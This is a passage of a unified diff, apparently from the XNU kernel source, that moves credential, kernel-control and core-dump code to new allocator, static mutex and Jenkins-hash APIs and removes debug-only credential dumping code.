mutex_held = ((struct ctl_cb *)so->so_pcb)->mtx; + mutex_held = &((struct ctl_cb *)so->so_pcb)->mtx; lck_mtx_assert(mutex_held, LCK_MTX_ASSERT_OWNED); so->unlock_lr[so->next_unlock_lr] = lr_saved; @@ -2154,7 +2120,7 @@ ctl_getlock(struct socket *so, int flags) panic("ctl_getlock: so=%p usecount=%x lrh= %s\n", so, so->so_usecount, solockhistory_nr(so)); } - return kcb->mtx; + return &kcb->mtx; } else { panic("ctl_getlock: so=%p NULL NO so_pcb %s\n", so, solockhistory_nr(so)); @@ -2173,12 +2139,12 @@ kctl_reg_list SYSCTL_HANDLER_ARGS struct kctl *kctl; size_t item_size = ROUNDUP64(sizeof(struct xkctl_reg)); - buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO); + buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO); if (buf == NULL) { return ENOMEM; } - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); n = kctlstat.kcs_reg_count; @@ -2262,11 +2228,9 @@ kctl_reg_list SYSCTL_HANDLER_ARGS } done: - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); - if (buf != NULL) { - FREE(buf, M_TEMP); - } + kheap_free(KHEAP_TEMP, buf, item_size); return error; } @@ -2285,12 +2249,12 @@ kctl_pcblist SYSCTL_HANDLER_ARGS 2 * ROUNDUP64(sizeof(struct xsockbuf_n)) + ROUNDUP64(sizeof(struct xsockstat_n)); - buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO); + buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO); if (buf == NULL) { return ENOMEM; } - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); n = kctlstat.kcs_pcbcount; @@ -2378,8 +2342,9 @@ kctl_pcblist SYSCTL_HANDLER_ARGS } done: - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_TEMP, buf, item_size); return error; } @@ -2389,7 +2354,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS #pragma unused(oidp, arg1, arg2) int error = 0; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if (req->newptr != USER_ADDR_NULL) { error = EPERM; @@ -2403,7 +2368,7 @@ kctl_getstat SYSCTL_HANDLER_ARGS error = SYSCTL_OUT(req, &kctlstat, MIN(sizeof(struct kctlstat), req->oldlen)); done: - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return error; } diff --git a/bsd/kern/kern_core.c b/bsd/kern/kern_core.c index a4a3ee6cf..244508acd 100644 --- a/bsd/kern/kern_core.c +++ b/bsd/kern/kern_core.c @@ -302,7 +302,7 @@ coredump(proc_t core_proc, uint32_t reserve_mb, int coredump_flags) (void) task_suspend_internal(task); - MALLOC(alloced_name, char *, MAXPATHLEN, M_TEMP, M_NOWAIT | M_ZERO); + alloced_name = zalloc_flags(ZV_NAMEI, Z_NOWAIT | Z_ZERO); /* create name according to sysctl'able format string */ /* if name creation fails, fall back to historical behaviour... */ @@ -562,7 +562,7 @@ out2: audit_proc_coredump(core_proc, name, error); #endif if (alloced_name != NULL) { - FREE(alloced_name, M_TEMP); + zfree(ZV_NAMEI, alloced_name); } if (error == 0) { error = error1; diff --git a/bsd/kern/kern_credential.c b/bsd/kern/kern_credential.c index c3eb07764..a864456f6 100644 --- a/bsd/kern/kern_credential.c +++ b/bsd/kern/kern_credential.c @@ -74,6 +74,7 @@ #include #endif +#include #include void mach_kauth_cred_uthread_update( void ); @@ -106,43 +107,12 @@ void mach_kauth_cred_uthread_update( void ); * * Note: Does *NOT* currently include per-thread credential changes */ - #if DEBUG_CRED #define DEBUG_CRED_ENTER printf #define DEBUG_CRED_CHANGE printf -extern void kauth_cred_print(kauth_cred_t cred); - -#include /* needed for get_backtrace( ) */ - -int is_target_cred( kauth_cred_t the_cred ); -void get_backtrace( void ); - -static int sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1, - __unused int arg2, struct sysctl_req *req ); -static int -sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1, - __unused int arg2, struct sysctl_req *req ); - -#define MAX_STACK_DEPTH 8 -struct cred_backtrace { - int depth; - void * stack[MAX_STACK_DEPTH]; -}; -typedef struct cred_backtrace cred_backtrace; - -#define MAX_CRED_BUFFER_SLOTS 200 -struct cred_debug_buffer { - int next_slot; - cred_backtrace stack_buffer[MAX_CRED_BUFFER_SLOTS]; -}; -typedef struct cred_debug_buffer cred_debug_buffer; -cred_debug_buffer * cred_debug_buf_p = NULL; - #else /* !DEBUG_CRED */ - #define DEBUG_CRED_ENTER(fmt, ...) do {} while (0) #define DEBUG_CRED_CHANGE(fmt, ...) do {} while (0) - #endif /* !DEBUG_CRED */ #if CONFIG_EXT_RESOLVER @@ -155,14 +125,14 @@ cred_debug_buffer * cred_debug_buf_p = NULL; * times out. */ -static lck_mtx_t *kauth_resolver_mtx; -#define KAUTH_RESOLVER_LOCK() lck_mtx_lock(kauth_resolver_mtx); -#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(kauth_resolver_mtx); +static LCK_MTX_DECLARE(kauth_resolver_mtx, &kauth_lck_grp); +#define KAUTH_RESOLVER_LOCK() lck_mtx_lock(&kauth_resolver_mtx); +#define KAUTH_RESOLVER_UNLOCK() lck_mtx_unlock(&kauth_resolver_mtx); static volatile pid_t kauth_resolver_identity; static int kauth_identitysvc_has_registered; static int kauth_resolver_registered; -static uint32_t kauth_resolver_sequence; +static uint32_t kauth_resolver_sequence = 31337; static int kauth_resolver_timeout = 30; /* default: 30 seconds */ struct kauth_resolver_work { @@ -178,9 +148,12 @@ struct kauth_resolver_work { int kr_result; }; -TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted; -TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work) kauth_resolver_submitted; -TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work) kauth_resolver_done; +TAILQ_HEAD(kauth_resolver_unsubmitted_head, kauth_resolver_work) kauth_resolver_unsubmitted = + TAILQ_HEAD_INITIALIZER(kauth_resolver_unsubmitted); +TAILQ_HEAD(kauth_resolver_submitted_head, kauth_resolver_work) kauth_resolver_submitted = + TAILQ_HEAD_INITIALIZER(kauth_resolver_submitted); +TAILQ_HEAD(kauth_resolver_done_head, kauth_resolver_work) kauth_resolver_done = + TAILQ_HEAD_INITIALIZER(kauth_resolver_done); /* Number of resolver timeouts between logged complaints */ #define KAUTH_COMPLAINT_INTERVAL 1000 @@ -233,10 +206,11 @@ struct kauth_identity { time_t ki_ntsid_expiry; }; -static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities; -static lck_mtx_t *kauth_identity_mtx; -#define KAUTH_IDENTITY_LOCK() lck_mtx_lock(kauth_identity_mtx); -#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(kauth_identity_mtx); +static TAILQ_HEAD(kauth_identity_head, kauth_identity) kauth_identities = + TAILQ_HEAD_INITIALIZER(kauth_identities); +static LCK_MTX_DECLARE(kauth_identity_mtx, &kauth_lck_grp); +#define KAUTH_IDENTITY_LOCK() lck_mtx_lock(&kauth_identity_mtx); +#define KAUTH_IDENTITY_UNLOCK() lck_mtx_unlock(&kauth_identity_mtx); #define KAUTH_IDENTITY_CACHEMAX_DEFAULT 100 /* XXX default sizing? */ static int kauth_identity_cachemax = KAUTH_IDENTITY_CACHEMAX_DEFAULT; static int kauth_identity_count; @@ -265,10 +239,11 @@ struct kauth_group_membership { #define KAUTH_GROUP_ISMEMBER (1<<0) }; -TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups; -static lck_mtx_t *kauth_groups_mtx; -#define KAUTH_GROUPS_LOCK() lck_mtx_lock(kauth_groups_mtx); -#define KAUTH_GROUPS_UNLOCK() lck_mtx_unlock(kauth_groups_mtx); +TAILQ_HEAD(kauth_groups_head, kauth_group_membership) kauth_groups = + TAILQ_HEAD_INITIALIZER(kauth_groups); +static LCK_MTX_DECLARE(kauth_groups_mtx, &kauth_lck_grp); +#define KAUTH_GROUPS_LOCK() lck_mtx_lock(&kauth_groups_mtx); +#define KAUTH_GROUPS_UNLOCK() lck_mtx_unlock(&kauth_groups_mtx); #define KAUTH_GROUPS_CACHEMAX_DEFAULT 100 /* XXX default sizing? */ static int kauth_groups_cachemax = KAUTH_GROUPS_CACHEMAX_DEFAULT; static int kauth_groups_count; @@ -283,6 +258,7 @@ static void kauth_groups_trimcache(int newsize); #define KAUTH_CRED_TABLE_SIZE 128 ZONE_DECLARE(ucred_zone, "cred", sizeof(struct ucred), ZC_ZFREE_CLEARMEM); + LIST_HEAD(kauth_cred_entry_head, ucred); static struct kauth_cred_entry_head kauth_cred_table_anchor[KAUTH_CRED_TABLE_SIZE]; @@ -323,7 +299,7 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__( /* we could compute a better timeout here */ ts.tv_sec = kauth_resolver_timeout; ts.tv_nsec = 0; - error = msleep(workp, kauth_resolver_mtx, PCATCH, "kr_submit", &ts); + error = msleep(workp, &kauth_resolver_mtx, PCATCH, "kr_submit", &ts); /* request has been completed? */ if ((error == 0) && (workp->kr_flags & KAUTH_REQUEST_DONE)) { break; @@ -343,43 +319,6 @@ __KERNEL_IS_WAITING_ON_EXTERNAL_CREDENTIAL_RESOLVER__( } -/* - * kauth_resolver_init - * - * Description: Initialize the daemon side of the credential identity resolver - * - * Parameters: (void) - * - * Returns: (void) - * - * Notes: Initialize the credential identity resolver for use; the - * credential identity resolver is the KPI used by the user - * space credential identity resolver daemon to communicate - * with the kernel via the identitysvc() system call.. - * - * This is how membership in more than 16 groups (1 effective - * and 15 supplementary) is supported, and also how UID's, - * UUID's, and so on, are translated to/from POSIX credential - * values. - * - * The credential identity resolver operates by attempting to - * determine identity first from the credential, then from - * the kernel credential identity cache, and finally by - * enqueueing a request to a user space daemon. - * - * This function is called from kauth_init() in the file - * kern_authorization.c. - */ -void -kauth_resolver_init(void) -{ - TAILQ_INIT(&kauth_resolver_unsubmitted); - TAILQ_INIT(&kauth_resolver_submitted); - TAILQ_INIT(&kauth_resolver_done); - kauth_resolver_sequence = 31337; - kauth_resolver_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); -} - /* * kauth_resolver_identity_reset * @@ -469,7 +408,8 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data } } - MALLOC(workp, struct kauth_resolver_work *, sizeof(*workp), M_KAUTH, M_WAITOK); + workp = kheap_alloc(KM_KAUTH, sizeof(struct kauth_resolver_work), + Z_WAITOK); if (workp == NULL) { return ENOMEM; } @@ -575,7 +515,7 @@ kauth_resolver_submit(struct kauth_identity_extlookup *lkp, uint64_t extend_data * If we dropped the last reference, free the request. */ if (shouldfree) { - FREE(workp, M_KAUTH); + kheap_free(KM_KAUTH, workp, sizeof(struct kauth_resolver_work)); } KAUTH_DEBUG("RESOLVER - returning %d", error); @@ -795,7 +735,7 @@ kauth_resolver_getwork_continue(int result) if (TAILQ_FIRST(&kauth_resolver_unsubmitted) == NULL) { int error; - error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); + error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); /* * If this is a wakeup from another thread in the resolver * deregistering it, error out the request-for-work thread @@ -938,7 +878,7 @@ kauth_resolver_getwork(user_addr_t message) struct uthread *ut = get_bsdthread_info(thread); ut->uu_save.uus_kauth.message = message; - error = msleep0(&kauth_resolver_unsubmitted, kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); + error = msleep0(&kauth_resolver_unsubmitted, &kauth_resolver_mtx, PCATCH, "GRGetWork", 0, kauth_resolver_getwork_continue); KAUTH_RESOLVER_UNLOCK(); /* * If this is a wakeup from another thread in the resolver @@ -1149,30 +1089,6 @@ kauth_resolver_complete(user_addr_t message) #define KI_VALID_GROUPS (1<<6) #if CONFIG_EXT_RESOLVER -/* - * kauth_identity_init - * - * Description: Initialize the kernel side of the credential identity resolver - * - * Parameters: (void) - * - * Returns: (void) - * - * Notes: Initialize the credential identity resolver for use; the - * credential identity resolver is the KPI used to communicate - * with a user space credential identity resolver daemon. - * - * This function is called from kauth_init() in the file - * kern_authorization.c. - */ -void -kauth_identity_init(void) -{ - TAILQ_INIT(&kauth_identities); - kauth_identity_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); -} - - /* * kauth_identity_alloc * @@ -1198,7 +1114,8 @@ kauth_identity_alloc(uid_t uid, gid_t gid, guid_t *guidp, time_t guid_expiry, struct kauth_identity *kip; /* get and fill in a new identity */ - MALLOC(kip, struct kauth_identity *, sizeof(*kip), M_KAUTH, M_WAITOK | M_ZERO); + kip = kheap_alloc(KM_KAUTH, sizeof(struct kauth_identity), + Z_WAITOK | Z_ZERO); if (kip != NULL) { if (gid != KAUTH_GID_NONE) { kip->ki_gid = gid; @@ -1334,7 +1251,7 @@ kauth_identity_register_and_free(struct kauth_identity *kip) vfs_removename(ip->ki_name); } /* free the expired entry */ - FREE(ip, M_KAUTH); + kheap_free(KM_KAUTH, ip, sizeof(struct kauth_identity)); } } @@ -1544,13 +1461,13 @@ kauth_identity_trimcache(int newsize) { struct kauth_identity *kip; - lck_mtx_assert(kauth_identity_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&kauth_identity_mtx, LCK_MTX_ASSERT_OWNED); while (kauth_identity_count > newsize) { kip = TAILQ_LAST(&kauth_identities, kauth_identity_head); TAILQ_REMOVE(&kauth_identities, kip, ki_link); kauth_identity_count--; - FREE(kip, M_KAUTH); + kheap_free(KM_KAUTH, kip, sizeof(struct kauth_identity)); } } @@ -2987,29 +2904,6 @@ found: * XXX the linked-list implementation here needs to be optimized. */ -/* - * kauth_groups_init - * - * Description: Initialize the groups cache - * - * Parameters: (void) - * - * Returns: (void) - * - * Notes: Initialize the groups cache for use; the group cache is used - * to avoid unnecessary calls out to user space. - * - * This function is called from kauth_init() in the file - * kern_authorization.c. - */ -void -kauth_groups_init(void) -{ - TAILQ_INIT(&kauth_groups); - kauth_groups_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); -} - - /* * kauth_groups_expired * @@ -3120,7 +3014,8 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el) } /* allocate a new record */ - MALLOC(gm, struct kauth_group_membership *, sizeof(*gm), M_KAUTH, M_WAITOK); + gm = kheap_alloc(KM_KAUTH, sizeof(struct kauth_group_membership), + Z_WAITOK); if (gm != NULL) { gm->gm_uid = el->el_uid; gm->gm_gid = el->el_gid; @@ -3150,9 +3045,7 @@ kauth_groups_updatecache(struct kauth_identity_extlookup *el) KAUTH_GROUPS_UNLOCK(); /* free expired cache entry */ - if (gm != NULL) { - FREE(gm, M_KAUTH); - } + kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership)); } /* @@ -3165,13 +3058,13 @@ kauth_groups_trimcache(int new_size) { struct kauth_group_membership *gm; - lck_mtx_assert(kauth_groups_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&kauth_groups_mtx, LCK_MTX_ASSERT_OWNED); while (kauth_groups_count > new_size) { gm = TAILQ_LAST(&kauth_groups, kauth_groups_head); TAILQ_REMOVE(&kauth_groups, gm, gm_link); kauth_groups_count--; - FREE(gm, M_KAUTH); + kheap_free(KM_KAUTH, gm, sizeof(struct kauth_group_membership)); } } #endif /* CONFIG_EXT_RESOLVER */ @@ -3508,7 +3401,7 @@ kauth_cred_issuser(kauth_cred_t cred) */ /* lock protecting credential hash table */ -static lck_mtx_t kauth_cred_hash_mtx; +static LCK_MTX_DECLARE(kauth_cred_hash_mtx, &kauth_lck_grp); #define KAUTH_CRED_HASH_LOCK() lck_mtx_lock(&kauth_cred_hash_mtx); #define KAUTH_CRED_HASH_UNLOCK() lck_mtx_unlock(&kauth_cred_hash_mtx); #define KAUTH_CRED_HASH_LOCK_ASSERT() LCK_MTX_ASSERT(&kauth_cred_hash_mtx, LCK_MTX_ASSERT_OWNED) @@ -3548,8 +3441,6 @@ static lck_mtx_t kauth_cred_hash_mtx; void kauth_cred_init(void) { - lck_mtx_init(&kauth_cred_hash_mtx, kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); - for (int i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) { LIST_INIT(&kauth_cred_table_anchor[i]); } @@ -4812,12 +4703,6 @@ kauth_cred_tryref(kauth_cred_t cred) kauth_cred_panic_over_retain(cred); } -#if 0 // use this to watch a specific credential - if (is_target_cred( *credp ) != 0) { - get_backtrace(); - } -#endif - return true; } @@ -4841,12 +4726,6 @@ kauth_cred_ref(kauth_cred_t cred) if (__improbable(old_ref >= KAUTH_CRED_REF_MAX)) { kauth_cred_panic_over_retain(cred); } - -#if 0 // use this to watch a specific credential - if (is_target_cred( cred ) != 0) { - get_backtrace(); - } -#endif } /* @@ -4866,12 +4745,6 @@ kauth_cred_unref_fast(kauth_cred_t cred) { u_long old_ref = os_atomic_dec_orig(&cred->cr_ref, relaxed); -#if 0 // use this to watch a specific credential - if (is_target_cred( *credp ) != 0) { - get_backtrace(); - } -#endif - if (__improbable(old_ref <= 0)) { kauth_cred_panic_over_released(cred); } @@ -5246,7 +5119,7 @@ kauth_cred_is_equal(kauth_cred_t cred1, kauth_cred_t cred2) #if CONFIG_MACF /* Note: we know the flags are equal, so we only need to test one */ if (pcred1->cr_flags & CRF_MAC_ENFORCE) { - if (!mac_cred_label_compare(cred1->cr_label, cred2->cr_label)) { + if (!mac_cred_label_is_equal(cred1->cr_label, cred2->cr_label)) { return false; } } @@ -5328,37 +5201,6 @@ kauth_cred_find(kauth_cred_t cred) } -/* - * kauth_cred_hash - * - * Description: Generates a hash key using data that makes up a credential; - * based on ElfHash - * - * Parameters: datap Pointer to data to hash - * data_len Count of bytes to hash - * start_key Start key value - * - * Returns: (u_long) Returned hash key - */ -static inline u_long -kauth_cred_hash(const uint8_t *datap, int data_len, u_long start_key) -{ - u_long hash_key = start_key; - u_long temp; - - while (data_len > 0) { - hash_key = (hash_key << 4) + *datap++; - temp = hash_key & 0xF0000000; - if (temp) { - hash_key ^= temp >> 24; - } - hash_key &= ~temp; - data_len--; - } - return hash_key; -} - - /* * kauth_cred_get_bucket * @@ -5383,356 +5225,25 @@ kauth_cred_get_bucket(kauth_cred_t cred) #if CONFIG_MACF posix_cred_t pcred = posix_cred_get(cred); #endif - u_long hash_key = 0; - - hash_key = kauth_cred_hash((uint8_t *)&cred->cr_posix, - sizeof(struct posix_cred), - hash_key); - hash_key = kauth_cred_hash((uint8_t *)&cred->cr_audit, - sizeof(struct au_session), - hash_key); + uint32_t hash_key = 0; + + hash_key = os_hash_jenkins_update(&cred->cr_posix, + sizeof(struct posix_cred), hash_key); + + hash_key = os_hash_jenkins_update(&cred->cr_audit, + sizeof(struct au_session), hash_key); #if CONFIG_MACF if (pcred->cr_flags & CRF_MAC_ENFORCE) { - hash_key = kauth_cred_hash((uint8_t *)cred->cr_label, - sizeof(struct label), - hash_key); + hash_key = mac_cred_label_hash_update(cred->cr_label, hash_key); } -#endif +#endif /* CONFIG_MACF */ + hash_key = os_hash_jenkins_finish(hash_key); hash_key %= KAUTH_CRED_TABLE_SIZE; return &kauth_cred_table_anchor[hash_key]; } -#ifdef DEBUG_CRED -/* - * kauth_cred_print - * - * Description: Print out an individual credential's contents for debugging - * purposes - * - * Parameters: cred The credential to print out - * - * Returns: (void) - * - * Implicit returns: Results in console output - */ -void -kauth_cred_print(kauth_cred_t cred) -{ - int i; - - printf("%p - refs %lu flags 0x%08x uids e%d r%d sv%d gm%d ", cred, cred->cr_ref, cred->cr_flags, cred->cr_uid, cred->cr_ruid, cred->cr_svuid, cred->cr_gmuid); - printf("group count %d gids ", cred->cr_ngroups); - for (i = 0; i < NGROUPS; i++) { - if (i == 0) { - printf("e"); - } - printf("%d ", cred->cr_groups[i]); - } - printf("r%d sv%d ", cred->cr_rgid, cred->cr_svgid); - printf("auditinfo_addr %d %d %d %d %d %d\n", - cred->cr_audit.s_aia_p->ai_auid, - cred->cr_audit.as_mask.am_success, - cred->cr_audit.as_mask.am_failure, - cred->cr_audit.as_aia_p->ai_termid.at_port, - cred->cr_audit.as_aia_p->ai_termid.at_addr[0], - cred->cr_audit.as_aia_p->ai_asid); -} - -int -is_target_cred( kauth_cred_t the_cred ) -{ - if (the_cred->cr_uid != 0) { - return 0; - } - if (the_cred->cr_ruid != 0) { - return 0; - } - if (the_cred->cr_svuid != 0) { - return 0; - } - if (the_cred->cr_ngroups != 11) { - return 0; - } - if (the_cred->cr_groups[0] != 11) { - return 0; - } - if (the_cred->cr_groups[1] != 81) { - return 0; - } - if (the_cred->cr_groups[2] != 63947) { - return 0; - } - if (the_cred->cr_groups[3] != 80288) { - return 0; - } - if (the_cred->cr_groups[4] != 89006) { - return 0; - } - if (the_cred->cr_groups[5] != 52173) { - return 0; - } - if (the_cred->cr_groups[6] != 84524) { - return 0; - } - if (the_cred->cr_groups[7] != 79) { - return 0; - } - if (the_cred->cr_groups[8] != 80292) { - return 0; - } - if (the_cred->cr_groups[9] != 80) { - return 0; - } - if (the_cred->cr_groups[10] != 90824) { - return 0; - } - if (the_cred->cr_rgid != 11) { - return 0; - } - if (the_cred->cr_svgid != 11) { - return 0; - } - if (the_cred->cr_gmuid != 3475) { - return 0; - } - if (the_cred->cr_audit.as_aia_p->ai_auid != 3475) { - return 0; - } -/* - * if ( the_cred->cr_audit.as_mask.am_success != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_mask.am_failure != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_aia_p->ai_termid.at_port != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_aia_p->ai_termid.at_addr[0] != 0 ) - * return( 0 ); - * if ( the_cred->cr_audit.as_aia_p->ai_asid != 0 ) - * return( 0 ); - * if ( the_cred->cr_flags != 0 ) - * return( 0 ); - */ - return -1; // found target cred -} - -void -get_backtrace( void ) -{ - int my_slot; - void * my_stack[MAX_STACK_DEPTH]; - int i, my_depth; - - if (cred_debug_buf_p == NULL) { - MALLOC(cred_debug_buf_p, cred_debug_buffer *, sizeof(*cred_debug_buf_p), M_KAUTH, M_WAITOK); - bzero(cred_debug_buf_p, sizeof(*cred_debug_buf_p)); - } - - if (cred_debug_buf_p->next_slot > (MAX_CRED_BUFFER_SLOTS - 1)) { - /* buffer is full */ - return; - } - - my_depth = OSBacktrace(&my_stack[0], MAX_STACK_DEPTH); - if (my_depth == 0) { - printf("%s - OSBacktrace failed \n", __FUNCTION__); - return; - } - - /* fill new backtrace */ - my_slot = cred_debug_buf_p->next_slot; - cred_debug_buf_p->next_slot++; - cred_debug_buf_p->stack_buffer[my_slot].depth = my_depth; - for (i = 0; i < my_depth; i++) { - cred_debug_buf_p->stack_buffer[my_slot].stack[i] = my_stack[i]; - } - - return; -} - - -/* subset of struct ucred for use in sysctl_dump_creds */ -struct debug_ucred { - void *credp; - u_long cr_ref; /* reference count */ - uid_t cr_uid; /* effective user id */ - uid_t cr_ruid; /* real user id */ - uid_t cr_svuid; /* saved user id */ - u_short cr_ngroups; /* number of groups in advisory list */ - gid_t cr_groups[NGROUPS]; /* advisory group list */ - gid_t cr_rgid; /* real group id */ - gid_t cr_svgid; /* saved group id */ - uid_t cr_gmuid; /* UID for group membership purposes */ - struct auditinfo_addr cr_audit; /* user auditing data. */ - void *cr_label; /* MACF label */ - int cr_flags; /* flags on credential */ -}; -typedef struct debug_ucred debug_ucred; - -SYSCTL_PROC(_kern, OID_AUTO, dump_creds, CTLFLAG_RD, - NULL, 0, sysctl_dump_creds, "S,debug_ucred", "List of credentials in the cred hash"); - -/* accessed by: - * err = sysctlbyname( "kern.dump_creds", bufp, &len, NULL, 0 ); - */ - -static int -sysctl_dump_creds( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req ) -{ - int i, j, counter = 0; - int error; - size_t space; - kauth_cred_t found_cred; - debug_ucred * cred_listp; - debug_ucred * nextp; - - /* This is a readonly node. */ - if (req->newptr != USER_ADDR_NULL) { - return EPERM; - } - - /* calculate space needed */ - for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) { - TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) { - counter++; - } - } - - /* they are querying us so just return the space required. */ - if (req->oldptr == USER_ADDR_NULL) { - counter += 10; // add in some padding; - req->oldidx = counter * sizeof(debug_ucred); - return 0; - } - - MALLOC( cred_listp, debug_ucred *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO); - if (cred_listp == NULL) { - return ENOMEM; - } - - /* fill in creds to send back */ - nextp = cred_listp; - space = 0; - for (i = 0; i < KAUTH_CRED_TABLE_SIZE; i++) { - TAILQ_FOREACH(found_cred, &kauth_cred_table_anchor[i], cr_link) { - nextp->credp = found_cred; - nextp->cr_ref = found_cred->cr_ref; - nextp->cr_uid = found_cred->cr_uid; - nextp->cr_ruid = found_cred->cr_ruid; - nextp->cr_svuid = found_cred->cr_svuid; - nextp->cr_ngroups = found_cred->cr_ngroups; - for (j = 0; j < nextp->cr_ngroups; j++) { - nextp->cr_groups[j] = found_cred->cr_groups[j]; - } - nextp->cr_rgid = found_cred->cr_rgid; - nextp->cr_svgid = found_cred->cr_svgid; - nextp->cr_gmuid = found_cred->cr_gmuid; - nextp->cr_audit.ai_auid = - found_cred->cr_audit.as_aia_p->ai_auid; - nextp->cr_audit.ai_mask.am_success = - found_cred->cr_audit.as_mask.am_success; - nextp->cr_audit.ai_mask.am_failure = - found_cred->cr_audit.as_mask.am_failure; - nextp->cr_audit.ai_termid.at_port = - found_cred->cr_audit.as_aia_p->ai_termid.at_port; - nextp->cr_audit.ai_termid.at_type = - found_cred->cr_audit.as_aia_p->ai_termid.at_type; - nextp->cr_audit.ai_termid.at_addr[0] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[0]; - nextp->cr_audit.ai_termid.at_addr[1] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[1]; - nextp->cr_audit.ai_termid.at_addr[2] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[2]; - nextp->cr_audit.ai_termid.at_addr[3] = - found_cred->cr_audit.as_aia_p->ai_termid.at_addr[3]; - nextp->cr_audit.ai_asid = - found_cred->cr_audit.as_aia_p->ai_asid; - nextp->cr_audit.ai_flags = - found_cred->cr_audit.as_aia_p->ai_flags; - nextp->cr_label = found_cred->cr_label; - nextp->cr_flags = found_cred->cr_flags; - nextp++; - space += sizeof(debug_ucred); - if (space > req->oldlen) { - FREE(cred_listp, M_TEMP); - return ENOMEM; - } - } - } - req->oldlen = space; - error = SYSCTL_OUT(req, cred_listp, req->oldlen); - FREE(cred_listp, M_TEMP); - return error; -} - - -SYSCTL_PROC(_kern, OID_AUTO, cred_bt, CTLFLAG_RD, - NULL, 0, sysctl_dump_cred_backtraces, "S,cred_debug_buffer", "dump credential backtrace"); - -/* accessed by: - * err = sysctlbyname( "kern.cred_bt", bufp, &len, NULL, 0 ); - */ - -static int -sysctl_dump_cred_backtraces( __unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req ) -{ - int i, j; - int error; - size_t space; - cred_debug_buffer * bt_bufp; - cred_backtrace * nextp; - - /* This is a readonly node. */ - if (req->newptr != USER_ADDR_NULL) { - return EPERM; - } - - if (cred_debug_buf_p == NULL) { - return EAGAIN; - } - - /* calculate space needed */ - space = sizeof(cred_debug_buf_p->next_slot); - space += (sizeof(cred_backtrace) * cred_debug_buf_p->next_slot); - - /* they are querying us so just return the space required. */ - if (req->oldptr == USER_ADDR_NULL) { - req->oldidx = space; - return 0; - } - - if (space > req->oldlen) { - return ENOMEM; - } - - MALLOC( bt_bufp, cred_debug_buffer *, req->oldlen, M_TEMP, M_WAITOK | M_ZERO); - if (bt_bufp == NULL) { - return ENOMEM; - } - - /* fill in backtrace info to send back */ - bt_bufp->next_slot = cred_debug_buf_p->next_slot; - space = sizeof(bt_bufp->next_slot); - - nextp = &bt_bufp->stack_buffer[0]; - for (i = 0; i < cred_debug_buf_p->next_slot; i++) { - nextp->depth = cred_debug_buf_p->stack_buffer[i].depth; - for (j = 0; j < nextp->depth; j++) { - nextp->stack[j] = cred_debug_buf_p->stack_buffer[i].stack[j]; - } - space += sizeof(*nextp); - nextp++; - } - req->oldlen = space; - error = SYSCTL_OUT(req, bt_bufp, req->oldlen); - FREE(bt_bufp, M_TEMP); - return error; -} - -#endif /* DEBUG_CRED */ - - /* ********************************************************************** * The following routines will be moved to a policy_posix.c module at diff --git a/bsd/kern/kern_cs.c b/bsd/kern/kern_cs.c index c3cc2afa8..5da291b6a 100644 --- a/bsd/kern/kern_cs.c +++ b/bsd/kern/kern_cs.c @@ -134,8 +134,6 @@ SECURITY_READ_ONLY_LATE(int) cs_library_val_enable = DEFAULT_CS_LIBRARY_VA_ENABL #endif /* !SECURE_KERNEL */ int cs_all_vnodes = 0; -static lck_grp_t *cs_lockgrp; - SYSCTL_INT(_vm, OID_AUTO, cs_force_kill, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_kill, 0, ""); SYSCTL_INT(_vm, OID_AUTO, cs_force_hard, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_hard, 0, ""); 